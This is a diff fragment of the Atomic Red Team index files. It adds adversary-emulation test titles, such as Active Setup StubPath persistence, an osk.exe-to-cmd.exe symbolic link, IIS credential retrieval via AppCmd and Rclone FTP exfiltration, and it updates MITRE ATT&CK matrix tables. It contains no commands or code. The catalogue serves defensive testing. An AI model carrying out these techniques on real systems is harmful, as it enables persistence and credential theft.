- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
|
||||
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
|
||||
- T1180 Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
|
||||
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
|
||||
@@ -927,6 +938,7 @@
|
||||
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
|
||||
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
|
||||
- Atomic Test #2: Replace binary of sticky keys [windows]
|
||||
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
|
||||
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
|
||||
@@ -980,6 +992,8 @@
|
||||
- T1505.004 IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
|
||||
- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
|
||||
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
|
||||
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
|
||||
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
|
||||
- Atomic Test #1: Authentication Package [windows]
|
||||
- T1128 Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -1156,6 +1170,8 @@
|
||||
- Atomic Test #1: Gsecdump [windows]
|
||||
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
|
||||
- Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
|
||||
- Atomic Test #4: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) [windows]
|
||||
- Atomic Test #5: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) [windows]
|
||||
- T1171 LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
|
||||
- Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
|
||||
@@ -1714,4 +1730,5 @@
|
||||
- Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
|
||||
- Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
|
||||
- Atomic Test #6: MAZE FTP Upload [windows]
|
||||
- Atomic Test #7: Exfiltration Over Alternative Protocol - FTP - Rclone [windows]
|
||||
|
||||
|
||||
@@ -22,7 +22,7 @@
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution: Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
|
||||
| | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
@@ -34,7 +34,7 @@
|
||||
| | | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Keychain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
|
||||
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Boot or Logon Autostart Execution: Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
|
||||
@@ -19,11 +19,11 @@
|
||||
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Access Control](../../T1548.002/T1548.002.md) | Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Window Discovery](../../T1010/T1010.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
|
||||
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
|
||||
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
|
||||
| [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | [Kubernetes Exec Into Container](../../T1609/T1609.md) | Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
|
||||
| | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Video Capture](../../T1125/T1125.md) | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | [System Network Connections Discovery](../../T1049/T1049.md) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
|
||||
@@ -177,7 +177,7 @@
|
||||
| | | | | Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | [HTML Smuggling](../../T1027.006/T1027.006.md) | | | | | | | |
|
||||
| | | | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) | | | | | | | |
|
||||
|
||||
@@ -13,9 +13,9 @@
|
||||
